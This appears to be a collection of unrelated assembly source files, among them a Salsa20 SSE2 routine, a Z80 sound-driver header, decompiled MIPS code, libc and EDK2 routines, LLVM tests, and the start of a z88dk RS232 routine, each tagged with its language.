MOVL DX,48(SP)
MOVL CX, 52 (SP)
MOVL R8, 56 (SP)
MOVL AX, 60 (SP)
CMPQ R9,$256
JB BYTESBETWEEN1AND255
MOVOA 48(SP),X0
PSHUFL $0X55,X0,X1
PSHUFL $0XAA,X0,X2
PSHUFL $0XFF,X0,X3
PSHUFL $0X00,X0,X0
MOVOA X1,64(SP)
MOVOA X2,80(SP)
MOVOA X3,96(SP)
MOVOA X0,112(SP)
MOVOA 0(SP),X0
PSHUFL $0XAA,X0,X1
PSHUFL $0XFF,X0,X2
PSHUFL $0X00,X0,X3
PSHUFL $0X55,X0,X0
MOVOA X1,128(SP)
MOVOA X2,144(SP)
MOVOA X3,160(SP)
MOVOA X0,176(SP)
MOVOA 16(SP),X0
PSHUFL $0XFF,X0,X1
PSHUFL $0X55,X0,X2
PSHUFL $0XAA,X0,X0
MOVOA X1,192(SP)
MOVOA X2,208(SP)
MOVOA X0,224(SP)
MOVOA 32(SP),X0
PSHUFL $0X00,X0,X1
PSHUFL $0XAA,X0,X2
PSHUFL $0XFF,X0,X0
MOVOA X1,240(SP)
MOVOA X2,256(SP)
MOVOA X0,272(SP)
BYTESATLEAST256:
MOVL 16(SP),DX
MOVL 36 (SP),CX
MOVL DX,288(SP)
MOVL CX,304(SP)
ADDQ $1,DX
SHLQ $32,CX
ADDQ CX,DX
MOVQ DX,CX
SHRQ $32,CX
MOVL DX, 292 (SP)
MOVL CX, 308 (SP)
ADDQ $1,DX
SHLQ $32,CX
ADDQ CX,DX
MOVQ DX,CX
SHRQ $32,CX
MOVL DX, 296 (SP)
MOVL CX, 312 (SP)
ADDQ $1,DX
SHLQ $32,CX
ADDQ CX,DX
MOVQ DX,CX
SHRQ $32,CX
MOVL DX, 300 (SP)
MOVL CX, 316 (SP)
ADDQ $1,DX
SHLQ $32,CX
ADDQ CX,DX
MOVQ DX,CX
SHRQ $32,CX
MOVL DX,16(SP)
MOVL CX, 36 (SP)
MOVQ R9,352(SP)
MOVQ $20,DX
MOVOA 64(SP),X0
MOVOA 80(SP),X1
MOVOA 96(SP),X2
MOVOA 256(SP),X3
MOVOA 272(SP),X4
MOVOA 128(SP),X5
MOVOA 144(SP),X6
MOVOA 176(SP),X7
MOVOA 192(SP),X8
MOVOA 208(SP),X9
MOVOA 224(SP),X10
MOVOA 304(SP),X11
MOVOA 112(SP),X12
MOVOA 160(SP),X13
MOVOA 240(SP),X14
MOVOA 288(SP),X15
MAINLOOP1:
MOVOA X1,320(SP)
MOVOA X2,336(SP)
MOVOA X13,X1
PADDL X12,X1
MOVOA X1,X2
PSLLL $7,X1
PXOR X1,X14
PSRLL $25,X2
PXOR X2,X14
MOVOA X7,X1
PADDL X0,X1
MOVOA X1,X2
PSLLL $7,X1
PXOR X1,X11
PSRLL $25,X2
PXOR X2,X11
MOVOA X12,X1
PADDL X14,X1
MOVOA X1,X2
PSLLL $9,X1
PXOR X1,X15
PSRLL $23,X2
PXOR X2,X15
MOVOA X0,X1
PADDL X11,X1
MOVOA X1,X2
PSLLL $9,X1
PXOR X1,X9
PSRLL $23,X2
PXOR X2,X9
MOVOA X14,X1
PADDL X15,X1
MOVOA X1,X2
PSLLL $13,X1
PXOR X1,X13
PSRLL $19,X2
PXOR X2,X13
MOVOA X11,X1
PADDL X9,X1
MOVOA X1,X2
PSLLL $13,X1
PXOR X1,X7
PSRLL $19,X2
PXOR X2,X7
MOVOA X15,X1
PADDL X13,X1
MOVOA X1,X2
PSLLL $18,X1
PXOR X1,X12
PSRLL $14,X2
PXOR X2,X12
MOVOA 320(SP),X1
MOVOA X12,320(SP)
MOVOA X9,X2
PADDL X7,X2
MOVOA X2,X12
PSLLL $18,X2
PXOR X2,X0
PSRLL $14,X12
PXOR X12,X0
MOVOA X5,X2
PADDL X1,X2
MOVOA X2,X12
PSLLL $7,X2
PXOR X2,X3
PSRLL $25,X12
PXOR X12,X3
MOVOA 336(SP),X2
MOVOA X0,336(SP)
MOVOA X6,X0
PADDL X2,X0
MOVOA X0,X12
PSLLL $7,X0
PXOR X0,X4
PSRLL $25,X12
PXOR X12,X4
MOVOA X1,X0
PADDL X3,X0
MOVOA X0,X12
PSLLL $9,X0
PXOR X0,X10
PSRLL $23,X12
PXOR X12,X10
MOVOA X2,X0
PADDL X4,X0
MOVOA X0,X12
PSLLL $9,X0
PXOR X0,X8
PSRLL $23,X12
PXOR X12,X8
MOVOA X3,X0
PADDL X10,X0
MOVOA X0,X12
PSLLL $13,X0
PXOR X0,X5
PSRLL $19,X12
PXOR X12,X5
MOVOA X4,X0
PADDL X8,X0
MOVOA X0,X12
PSLLL $13,X0
PXOR X0,X6
PSRLL $19,X12
PXOR X12,X6
MOVOA X10,X0
PADDL X5,X0
MOVOA X0,X12
PSLLL $18,X0
PXOR X0,X1
PSRLL $14,X12
PXOR X12,X1
MOVOA 320(SP),X0
MOVOA X1,320(SP)
MOVOA X4,X1
PADDL X0,X1
MOVOA X1,X12
PSLLL $7,X1
PXOR X1,X7
PSRLL $25,X12
PXOR X12,X7
MOVOA X8,X1
PADDL X6,X1
MOVOA X1,X12
PSLLL $18,X1
PXOR X1,X2
PSRLL $14,X12
PXOR X12,X2
MOVOA 336(SP),X12
MOVOA X2,336(SP)
MOVOA X14,X1
PADDL X12,X1
MOVOA X1,X2
PSLLL $7,X1
PXOR X1,X5
PSRLL $25,X2
PXOR X2,X5
MOVOA X0,X1
PADDL X7,X1
MOVOA X1,X2
PSLLL $9,X1
PXOR X1,X10
PSRLL $23,X2
PXOR X2,X10
MOVOA X12,X1
PADDL X5,X1
MOVOA X1,X2
PSLLL $9,X1
PXOR X1,X8
PSRLL $23,X2
PXOR X2,X8
MOVOA X7,X1
PADDL X10,X1
MOVOA X1,X2
PSLLL $13,X1
PXOR X1,X4
PSRLL $19,X2
PXOR X2,X4
MOVOA X5,X1
PADDL X8,X1
MOVOA X1,X2
PSLLL $13,X1
PXOR X1,X14
PSRLL $19,X2
PXOR X2,X14
MOVOA X10,X1
PADDL X4,X1
MOVOA X1,X2
PSLLL $18,X1
PXOR X1,X0
PSRLL $14,X2
PXOR X2,X0
MOVOA 320(SP),X1
MOVOA X0,320(SP)
MOVOA X8,X0
PADDL X14,X0
MOVOA X0,X2
PSLLL $18,X0
PXOR X0,X12
PSRLL $14,X2
PXOR X2,X12
MOVOA X11,X0
PADDL X1,X0
MOVOA X0,X2
PSLLL $7,X0
PXOR X0,X6
PSRLL $25,X2
PXOR X2,X6
MOVOA 336(SP),X2
MOVOA X12,336(SP)
MOVOA X3,X0
PADDL X2,X0
MOVOA X0,X12
PSLLL $7,X0
PXOR X0,X13
PSRLL $25,X12
PXOR X12,X13
MOVOA X1,X0
PADDL X6,X0
MOVOA X0,X12
PSLLL $9,X0
PXOR X0,X15
PSRLL $23,X12
PXOR X12,X15
MOVOA X2,X0
PADDL X13,X0
MOVOA X0,X12
PSLLL $9,X0
PXOR X0,X9
PSRLL $23,X12
PXOR X12,X9
MOVOA X6,X0
PADDL X15,X0
MOVOA X0,X12
PSLLL $13,X0
PXOR X0,X11
PSRLL $19,X12
PXOR X12,X11
MOVOA X13,X0
PADDL X9,X0
MOVOA X0,X12
PSLLL $13,X0
PXOR X0,X3
PSRLL $19,X12
PXOR X12,X3
MOVOA X15,X0
PADDL X11,X0
MOVOA X0,X12
PSLLL $18,X0
PXOR X0,X1
PSRLL $14,X12
PXOR X12,X1
MOVOA X9,X0
PADDL X3,X0
MOVOA X0,X12
PSLLL $18,X0
PXOR X0,X2
PSRLL $14,X12
PXOR X12,X2
MOVOA 320(SP),X12
MOVOA 336(SP),X0
SUBQ $2,DX
JA MAINLOOP1
PADDL 112(SP),X12
PADDL 176(SP),X7
PADDL 224(SP),X10
PADDL 272(SP),X4
MOVD X12,DX
MOVD X7,CX
MOVD X10,R8
MOVD X4,R9
PSHUFL $0X39,X12,X12
PSHUFL $0X39,X7,X7
PSHUFL $0X39,X10,X10
PSHUFL $0X39,X4,X4
XORL 0(SI),DX
XORL 4(SI),CX
XORL 8(SI),R8
XORL 12(SI),R9
MOVL DX,0(DI)
MOVL CX,4(DI)
MOVL R8,8(DI)
MOVL R9,12(DI)
MOVD X12,DX
MOVD X7,CX
MOVD X10,R8
MOVD X4,R9
PSHUFL $0X39,X12,X12
PSHUFL $0X39,X7,X7
PSHUFL $0X39,X10,X10
PSHUFL $0X39,X4,X4
XORL 64(SI),DX
XORL 68(SI),CX
XORL 72(SI),R8
XORL 76(SI),R9
MOVL DX,64(DI)
MOVL CX,68(DI)
MOVL R8,72(DI)
MOVL R9,76(DI)
MOVD X12,DX
MOVD X7,CX
MOVD X10,R8
MOVD X4,R9
PSHUFL $0X39,X12,X12
PSHUFL $0X39,X7,X7
PSHUFL $0X39,X10,X10
PSHUFL $0X39,X4,X4
XORL 128(SI),DX
XORL 132(SI),CX
XORL 136(SI),R8
XORL 140(SI),R9
MOVL DX,128(DI)
MOVL CX,132(DI)
MOVL R8,136(DI)
MOVL R9,140(DI)
MOVD X12,DX
MOVD X7,CX
MOVD X10,R8
MOVD X4,R9
XORL 192(SI),DX
XORL 196(SI),CX
XORL 200(SI),R8
XORL 204(SI),R9
MOVL DX,192(DI)
MOVL CX,196(DI)
MOVL R8,200(DI)
MOVL R9,204(DI)
PADDL 240(SP),X14
PADDL 64(SP),X0
PADDL 128(SP),X5
PADDL 192(SP),X8
MOVD X14,DX
MOVD X0,CX
MOVD X5,R8
MOVD X8,R9
PSHUFL $0X39,X14,X14
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X5,X5
PSHUFL $0X39,X8,X8
XORL 16(SI),DX
XORL 20(SI),CX
XORL 24(SI),R8
XORL 28(SI),R9
MOVL DX,16(DI)
MOVL CX,20(DI)
MOVL R8,24(DI)
MOVL R9,28(DI)
MOVD X14,DX
MOVD X0,CX
MOVD X5,R8
MOVD X8,R9
PSHUFL $0X39,X14,X14
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X5,X5
PSHUFL $0X39,X8,X8
XORL 80(SI),DX
XORL 84(SI),CX
XORL 88(SI),R8
XORL 92(SI),R9
MOVL DX,80(DI)
MOVL CX,84(DI)
MOVL R8,88(DI)
MOVL R9,92(DI)
MOVD X14,DX
MOVD X0,CX
MOVD X5,R8
MOVD X8,R9
PSHUFL $0X39,X14,X14
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X5,X5
PSHUFL $0X39,X8,X8
XORL 144(SI),DX
XORL 148(SI),CX
XORL 152(SI),R8
XORL 156(SI),R9
MOVL DX,144(DI)
MOVL CX,148(DI)
MOVL R8,152(DI)
MOVL R9,156(DI)
MOVD X14,DX
MOVD X0,CX
MOVD X5,R8
MOVD X8,R9
XORL 208(SI),DX
XORL 212(SI),CX
XORL 216(SI),R8
XORL 220(SI),R9
MOVL DX,208(DI)
MOVL CX,212(DI)
MOVL R8,216(DI)
MOVL R9,220(DI)
PADDL 288(SP),X15
PADDL 304(SP),X11
PADDL 80(SP),X1
PADDL 144(SP),X6
MOVD X15,DX
MOVD X11,CX
MOVD X1,R8
MOVD X6,R9
PSHUFL $0X39,X15,X15
PSHUFL $0X39,X11,X11
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X6,X6
XORL 32(SI),DX
XORL 36(SI),CX
XORL 40(SI),R8
XORL 44(SI),R9
MOVL DX,32(DI)
MOVL CX,36(DI)
MOVL R8,40(DI)
MOVL R9,44(DI)
MOVD X15,DX
MOVD X11,CX
MOVD X1,R8
MOVD X6,R9
PSHUFL $0X39,X15,X15
PSHUFL $0X39,X11,X11
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X6,X6
XORL 96(SI),DX
XORL 100(SI),CX
XORL 104(SI),R8
XORL 108(SI),R9
MOVL DX,96(DI)
MOVL CX,100(DI)
MOVL R8,104(DI)
MOVL R9,108(DI)
MOVD X15,DX
MOVD X11,CX
MOVD X1,R8
MOVD X6,R9
PSHUFL $0X39,X15,X15
PSHUFL $0X39,X11,X11
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X6,X6
XORL 160(SI),DX
XORL 164(SI),CX
XORL 168(SI),R8
XORL 172(SI),R9
MOVL DX,160(DI)
MOVL CX,164(DI)
MOVL R8,168(DI)
MOVL R9,172(DI)
MOVD X15,DX
MOVD X11,CX
MOVD X1,R8
MOVD X6,R9
XORL 224(SI),DX
XORL 228(SI),CX
XORL 232(SI),R8
XORL 236(SI),R9
MOVL DX,224(DI)
MOVL CX,228(DI)
MOVL R8,232(DI)
MOVL R9,236(DI)
PADDL 160(SP),X13
PADDL 208(SP),X9
PADDL 256(SP),X3
PADDL 96(SP),X2
MOVD X13,DX
MOVD X9,CX
MOVD X3,R8
MOVD X2,R9
PSHUFL $0X39,X13,X13
PSHUFL $0X39,X9,X9
PSHUFL $0X39,X3,X3
PSHUFL $0X39,X2,X2
XORL 48(SI),DX
XORL 52(SI),CX
XORL 56(SI),R8
XORL 60(SI),R9
MOVL DX,48(DI)
MOVL CX,52(DI)
MOVL R8,56(DI)
MOVL R9,60(DI)
MOVD X13,DX
MOVD X9,CX
MOVD X3,R8
MOVD X2,R9
PSHUFL $0X39,X13,X13
PSHUFL $0X39,X9,X9
PSHUFL $0X39,X3,X3
PSHUFL $0X39,X2,X2
XORL 112(SI),DX
XORL 116(SI),CX
XORL 120(SI),R8
XORL 124(SI),R9
MOVL DX,112(DI)
MOVL CX,116(DI)
MOVL R8,120(DI)
MOVL R9,124(DI)
MOVD X13,DX
MOVD X9,CX
MOVD X3,R8
MOVD X2,R9
PSHUFL $0X39,X13,X13
PSHUFL $0X39,X9,X9
PSHUFL $0X39,X3,X3
PSHUFL $0X39,X2,X2
XORL 176(SI),DX
XORL 180(SI),CX
XORL 184(SI),R8
XORL 188(SI),R9
MOVL DX,176(DI)
MOVL CX,180(DI)
MOVL R8,184(DI)
MOVL R9,188(DI)
MOVD X13,DX
MOVD X9,CX
MOVD X3,R8
MOVD X2,R9
XORL 240(SI),DX
XORL 244(SI),CX
XORL 248(SI),R8
XORL 252(SI),R9
MOVL DX,240(DI)
MOVL CX,244(DI)
MOVL R8,248(DI)
MOVL R9,252(DI)
MOVQ 352(SP),R9
SUBQ $256,R9
ADDQ $256,SI
ADDQ $256,DI
CMPQ R9,$256
JAE BYTESATLEAST256
CMPQ R9,$0
JBE DONE
BYTESBETWEEN1AND255:
CMPQ R9,$64
JAE NOCOPY
MOVQ DI,DX
LEAQ 360(SP),DI
MOVQ R9,CX
REP; MOVSB
LEAQ 360(SP),DI
LEAQ 360(SP),SI
NOCOPY:
MOVQ R9,352(SP)
MOVOA 48(SP),X0
MOVOA 0(SP),X1
MOVOA 16(SP),X2
MOVOA 32(SP),X3
MOVOA X1,X4
MOVQ $20,CX
MAINLOOP2:
PADDL X0,X4
MOVOA X0,X5
MOVOA X4,X6
PSLLL $7,X4
PSRLL $25,X6
PXOR X4,X3
PXOR X6,X3
PADDL X3,X5
MOVOA X3,X4
MOVOA X5,X6
PSLLL $9,X5
PSRLL $23,X6
PXOR X5,X2
PSHUFL $0X93,X3,X3
PXOR X6,X2
PADDL X2,X4
MOVOA X2,X5
MOVOA X4,X6
PSLLL $13,X4
PSRLL $19,X6
PXOR X4,X1
PSHUFL $0X4E,X2,X2
PXOR X6,X1
PADDL X1,X5
MOVOA X3,X4
MOVOA X5,X6
PSLLL $18,X5
PSRLL $14,X6
PXOR X5,X0
PSHUFL $0X39,X1,X1
PXOR X6,X0
PADDL X0,X4
MOVOA X0,X5
MOVOA X4,X6
PSLLL $7,X4
PSRLL $25,X6
PXOR X4,X1
PXOR X6,X1
PADDL X1,X5
MOVOA X1,X4
MOVOA X5,X6
PSLLL $9,X5
PSRLL $23,X6
PXOR X5,X2
PSHUFL $0X93,X1,X1
PXOR X6,X2
PADDL X2,X4
MOVOA X2,X5
MOVOA X4,X6
PSLLL $13,X4
PSRLL $19,X6
PXOR X4,X3
PSHUFL $0X4E,X2,X2
PXOR X6,X3
PADDL X3,X5
MOVOA X1,X4
MOVOA X5,X6
PSLLL $18,X5
PSRLL $14,X6
PXOR X5,X0
PSHUFL $0X39,X3,X3
PXOR X6,X0
PADDL X0,X4
MOVOA X0,X5
MOVOA X4,X6
PSLLL $7,X4
PSRLL $25,X6
PXOR X4,X3
PXOR X6,X3
PADDL X3,X5
MOVOA X3,X4
MOVOA X5,X6
PSLLL $9,X5
PSRLL $23,X6
PXOR X5,X2
PSHUFL $0X93,X3,X3
PXOR X6,X2
PADDL X2,X4
MOVOA X2,X5
MOVOA X4,X6
PSLLL $13,X4
PSRLL $19,X6
PXOR X4,X1
PSHUFL $0X4E,X2,X2
PXOR X6,X1
PADDL X1,X5
MOVOA X3,X4
MOVOA X5,X6
PSLLL $18,X5
PSRLL $14,X6
PXOR X5,X0
PSHUFL $0X39,X1,X1
PXOR X6,X0
PADDL X0,X4
MOVOA X0,X5
MOVOA X4,X6
PSLLL $7,X4
PSRLL $25,X6
PXOR X4,X1
PXOR X6,X1
PADDL X1,X5
MOVOA X1,X4
MOVOA X5,X6
PSLLL $9,X5
PSRLL $23,X6
PXOR X5,X2
PSHUFL $0X93,X1,X1
PXOR X6,X2
PADDL X2,X4
MOVOA X2,X5
MOVOA X4,X6
PSLLL $13,X4
PSRLL $19,X6
PXOR X4,X3
PSHUFL $0X4E,X2,X2
PXOR X6,X3
SUBQ $4,CX
PADDL X3,X5
MOVOA X1,X4
MOVOA X5,X6
PSLLL $18,X5
PXOR X7,X7
PSRLL $14,X6
PXOR X5,X0
PSHUFL $0X39,X3,X3
PXOR X6,X0
JA MAINLOOP2
PADDL 48(SP),X0
PADDL 0(SP),X1
PADDL 16(SP),X2
PADDL 32(SP),X3
MOVD X0,CX
MOVD X1,R8
MOVD X2,R9
MOVD X3,AX
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X2,X2
PSHUFL $0X39,X3,X3
XORL 0(SI),CX
XORL 48(SI),R8
XORL 32(SI),R9
XORL 16(SI),AX
MOVL CX,0(DI)
MOVL R8,48(DI)
MOVL R9,32(DI)
MOVL AX,16(DI)
MOVD X0,CX
MOVD X1,R8
MOVD X2,R9
MOVD X3,AX
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X2,X2
PSHUFL $0X39,X3,X3
XORL 20(SI),CX
XORL 4(SI),R8
XORL 52(SI),R9
XORL 36(SI),AX
MOVL CX,20(DI)
MOVL R8,4(DI)
MOVL R9,52(DI)
MOVL AX,36(DI)
MOVD X0,CX
MOVD X1,R8
MOVD X2,R9
MOVD X3,AX
PSHUFL $0X39,X0,X0
PSHUFL $0X39,X1,X1
PSHUFL $0X39,X2,X2
PSHUFL $0X39,X3,X3
XORL 40(SI),CX
XORL 24(SI),R8
XORL 8(SI),R9
XORL 56(SI),AX
MOVL CX,40(DI)
MOVL R8,24(DI)
MOVL R9,8(DI)
MOVL AX,56(DI)
MOVD X0,CX
MOVD X1,R8
MOVD X2,R9
MOVD X3,AX
XORL 60(SI),CX
XORL 44(SI),R8
XORL 28(SI),R9
XORL 12(SI),AX
MOVL CX,60(DI)
MOVL R8,44(DI)
MOVL R9,28(DI)
MOVL AX,12(DI)
MOVQ 352(SP),R9
MOVL 16(SP),CX
MOVL 36(SP),R8
ADDQ $1,CX
SHLQ $32,R8
ADDQ R8,CX
MOVQ CX,R8
SHRQ $32,R8
MOVL CX,16(SP)
MOVL R8,36(SP)
CMPQ R9,$64
JA BYTESATLEAST65
JAE BYTESATLEAST64
MOVQ DI,SI
MOVQ DX,DI
MOVQ R9,CX
REP; MOVSB
BYTESATLEAST64:
DONE:
MOVQ R12,SP
RET
BYTESATLEAST65:
SUBQ $64,R9
ADDQ $64,DI
ADDQ $64,SI
JMP BYTESBETWEEN1AND255
| {
"language": "Assembly"
} |
; ############################ define ##############################
YMPORT0 EQU $4000 ; YM2612 port 0
YMPORT1 EQU $4001 ; YM2612 port 1
YMPORT2 EQU $4002 ; YM2612 port 2
YMPORT3 EQU $4003 ; YM2612 port 3
VDPSTATUS_H EQU $7F04 ; VDP status port high
VDPSTATUS_L EQU $7F05 ; VDP status port low
VCOUNTER EQU $7F08 ; V counter
HCOUNTER EQU $7F09 ; H counter
PSGPORT EQU $7F11 ; PSG port
BANKREG EQU $6000 ; bank register
COMPLAY_SFT EQU 0 ; start play command
COMSTOP_SFT EQU 4 ; stop play command
STATPLAY_SFT EQU 0 ; playing status
STATREADY_SFT EQU 7 ; driver ready status
CH0_SFT EQU 0 ; channel 0
CH1_SFT EQU 1 ; channel 1
CH2_SFT EQU 2 ; channel 2
CH3_SFT EQU 3 ; channel 3
COMPLAY EQU 1<<COMPLAY_SFT
COMSTOP EQU 1<<COMSTOP_SFT
STATPLAY EQU 1<<STATPLAY_SFT
STATREADY EQU 1<<STATREADY_SFT
CH0 EQU 1<<CH0_SFT
CH1 EQU 1<<CH1_SFT
CH2 EQU 1<<CH2_SFT
CH3 EQU 1<<CH3_SFT
; ########################### variable #############################
COMMAND EQU $0100 ; command from 68K
STATUS EQU $0102 ; status from Z80
PARAMS EQU $0104 ; parameters (68K and Z80)
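; ######################### usage sketch ###########################
; Hypothetical example, not part of the original driver: a Z80 main
; loop might poll COMMAND for a play request from the 68K and report
; back through STATUS, e.g.:
;
; .poll
;     ld a,(COMMAND)            ; read command word written by the 68K
;     and COMPLAY               ; start-play request pending?
;     jr z,.poll                ; no - keep polling
;     ld a,STATREADY|STATPLAY   ; yes - flag driver ready and playing
;     ld (STATUS),a
;     jr .poll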
| {
"language": "Assembly"
} |
glabel func_80039A3C
/* AB0BDC 80039A3C C7A40024 */ lwc1 $f4, 0x24($sp)
/* AB0BE0 80039A40 C7A60020 */ lwc1 $f6, 0x20($sp)
/* AB0BE4 80039A44 C7AA001C */ lwc1 $f10, 0x1c($sp)
/* AB0BE8 80039A48 C7B20010 */ lwc1 $f18, 0x10($sp)
/* AB0BEC 80039A4C 46062201 */ sub.s $f8, $f4, $f6
/* AB0BF0 80039A50 C4D00000 */ lwc1 $f16, ($a2)
/* AB0BF4 80039A54 460A4002 */ mul.s $f0, $f8, $f10
/* AB0BF8 80039A58 00000000 */ nop
/* AB0BFC 80039A5C 46120102 */ mul.s $f4, $f0, $f18
/* AB0C00 80039A60 46048180 */ add.s $f6, $f16, $f4
/* AB0C04 80039A64 E4C60000 */ swc1 $f6, ($a2)
/* AB0C08 80039A68 C7AA0018 */ lwc1 $f10, 0x18($sp)
/* AB0C0C 80039A6C C4E80000 */ lwc1 $f8, ($a3)
/* AB0C10 80039A70 460A0482 */ mul.s $f18, $f0, $f10
/* AB0C14 80039A74 46124400 */ add.s $f16, $f8, $f18
/* AB0C18 80039A78 E4F00000 */ swc1 $f16, ($a3)
/* AB0C1C 80039A7C 8FAE0028 */ lw $t6, 0x28($sp)
/* AB0C20 80039A80 8DC20000 */ lw $v0, ($t6)
/* AB0C24 80039A84 14400004 */ bnez $v0, .L80039A98
/* AB0C28 80039A88 00000000 */ nop
/* AB0C2C 80039A8C ADC50000 */ sw $a1, ($t6)
/* AB0C30 80039A90 03E00008 */ jr $ra
/* AB0C34 80039A94 24020001 */ li $v0, 1
.L80039A98:
/* AB0C38 80039A98 8C8F0000 */ lw $t7, ($a0)
/* AB0C3C 80039A9C 94590000 */ lhu $t9, ($v0)
/* AB0C40 80039AA0 00001025 */ move $v0, $zero
/* AB0C44 80039AA4 8DF8001C */ lw $t8, 0x1c($t7)
/* AB0C48 80039AA8 001940C0 */ sll $t0, $t9, 3
/* AB0C4C 80039AAC 8FAB0028 */ lw $t3, 0x28($sp)
/* AB0C50 80039AB0 03084821 */ addu $t1, $t8, $t0
/* AB0C54 80039AB4 8D230004 */ lw $v1, 4($t1)
/* AB0C58 80039AB8 00035100 */ sll $t2, $v1, 4
/* AB0C5C 80039ABC 05410003 */ bgez $t2, .L80039ACC
/* AB0C60 80039AC0 00000000 */ nop
/* AB0C64 80039AC4 10000001 */ b .L80039ACC
/* AB0C68 80039AC8 24020001 */ li $v0, 1
.L80039ACC:
/* AB0C6C 80039ACC 54400005 */ bnezl $v0, .L80039AE4
/* AB0C70 80039AD0 00001025 */ move $v0, $zero
/* AB0C74 80039AD4 AD650000 */ sw $a1, ($t3)
/* AB0C78 80039AD8 03E00008 */ jr $ra
/* AB0C7C 80039ADC 24020001 */ li $v0, 1
/* AB0C80 80039AE0 00001025 */ move $v0, $zero
.L80039AE4:
/* AB0C84 80039AE4 03E00008 */ jr $ra
/* AB0C88 80039AE8 00000000 */ nop
| {
"language": "Assembly"
} |
.set noreorder
.global _longjmp
.global longjmp
.type _longjmp,@function
.type longjmp,@function
_longjmp:
longjmp:
move $2, $5
bne $2, $0, 1f
nop
addu $2, $2, 1
1:
#ifndef __mips_soft_float
ldc1 $24, 96($4)
ldc1 $25, 104($4)
ldc1 $26, 112($4)
ldc1 $27, 120($4)
ldc1 $28, 128($4)
ldc1 $29, 136($4)
ldc1 $30, 144($4)
ldc1 $31, 152($4)
#endif
ld $ra, 0($4)
ld $sp, 8($4)
ld $gp, 16($4)
ld $16, 24($4)
ld $17, 32($4)
ld $18, 40($4)
ld $19, 48($4)
ld $20, 56($4)
ld $21, 64($4)
ld $22, 72($4)
ld $23, 80($4)
ld $30, 88($4)
jr $ra
nop
| {
"language": "Assembly"
} |
/* Non-shared version of memcpy_chk for i686.
Copyright (C) 2017-2020 Free Software Foundation, Inc.
This file is part of the GNU C Library.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<https://www.gnu.org/licenses/>. */
#if IS_IN (libc) && !defined SHARED
# include <sysdeps/i386/memcpy_chk.S>
#endif
| {
"language": "Assembly"
} |
;------------------------------------------------------------------------------
;
; Copyright (c) 2006, Intel Corporation. All rights reserved.<BR>
; This program and the accompanying materials
; are licensed and made available under the terms and conditions of the BSD License
; which accompanies this distribution. The full text of the license may be found at
; http://opensource.org/licenses/bsd-license.php.
;
; THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
; WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
;
; Module Name:
;
; InterlockedCompareExchange32.Asm
;
; Abstract:
;
; InterlockedCompareExchange32 function
;
; Notes:
;
;------------------------------------------------------------------------------
.486
.model flat,C
.code
;------------------------------------------------------------------------------
; UINT32
; EFIAPI
; InternalSyncCompareExchange32 (
; IN UINT32 *Value,
; IN UINT32 CompareValue,
; IN UINT32 ExchangeValue
; );
;------------------------------------------------------------------------------
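;
; Hypothetical C usage sketch (not part of this module):
;
;   UINT32 v = 5;
;   UINT32 old = InternalSyncCompareExchange32 (&v, 5, 7);
;   // atomically: if (v == 5) v = 7; 'old' receives the value that
;   // was observed in v (here 5), whether or not the compare matched
;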
InternalSyncCompareExchange32 PROC
mov ecx, [esp + 4]
mov eax, [esp + 8]
mov edx, [esp + 12]
lock cmpxchg [ecx], edx
ret
InternalSyncCompareExchange32 ENDP
END
| {
"language": "Assembly"
} |
// RUN: not llvm-mc -triple arm64-linux-gnu -mattr=-fp-armv8,-crc < %s 2> %t
// RUN: FileCheck --check-prefix=CHECK-ERROR < %t %s
fcvt d0, s0
// CHECK-ERROR: error: instruction requires: fp-armv8
// CHECK-ERROR-NEXT: fcvt d0, s0
// CHECK-ERROR-NEXT: ^
fmla v9.2s, v9.2s, v0.2s
// CHECK-ERROR: error: instruction requires: neon
// CHECK-ERROR-NEXT: fmla v9.2s, v9.2s, v0.2s
// CHECK-ERROR-NEXT: ^
pmull v0.1q, v1.1d, v2.1d
// CHECK-ERROR: error: instruction requires: crypto
// CHECK-ERROR-NEXT: pmull v0.1q, v1.1d, v2.1d
// CHECK-ERROR-NEXT: ^
crc32b w5, w7, w20
// CHECK-ERROR: error: instruction requires: crc
// CHECK-ERROR-NEXT: crc32b w5, w7, w20
// CHECK-ERROR-NEXT: ^
| {
"language": "Assembly"
} |
; RUN: opt < %s -S -loop-unswitch -verify-loop-info -verify-dom-info | FileCheck %s
; PR12343: -loop-unswitch crash on indirect branch
; CHECK: %0 = icmp eq i64 undef, 0
; CHECK-NEXT: br i1 %0, label %"5", label %"4"
; CHECK: "5": ; preds = %entry
; CHECK-NEXT: br label %"16"
; CHECK: "16": ; preds = %"22", %"5"
; CHECK-NEXT: indirectbr i8* undef, [label %"22", label %"33"]
; CHECK: "22": ; preds = %"16"
; CHECK-NEXT: br i1 %0, label %"16", label %"26"
; CHECK: "26": ; preds = %"22"
; CHECK-NEXT: unreachable
define void @foo() {
entry:
%0 = icmp eq i64 undef, 0
br i1 %0, label %"5", label %"4"
"4": ; preds = %entry
unreachable
"5": ; preds = %entry
br label %"16"
"16": ; preds = %"22", %"5"
indirectbr i8* undef, [label %"22", label %"33"]
"22": ; preds = %"16"
br i1 %0, label %"16", label %"26"
"26": ; preds = %"22"
unreachable
"33": ; preds = %"16"
unreachable
}
| {
"language": "Assembly"
} |
;
; z88dk RS232 Function
;
; OSCA version
;
; unsigned char rs232_put(char)
;
; $Id: rs232_put.asm,v 1.4 2016-07-29 03:28:48 pauloscustodio Exp $
; __FASTCALL__
SECTION code_clib
PUBLIC rs232_put
PUBLIC _rs232_put
INCLUDE "target/osca/def/osca.def"
rs232_put:
_rs232_put:
ld c,2
.s_wait
in a,(sys_joy_com_flags) ; ensure no byte is still being transmitted
bit 7,a
jr nz,s_wait
ld a,l
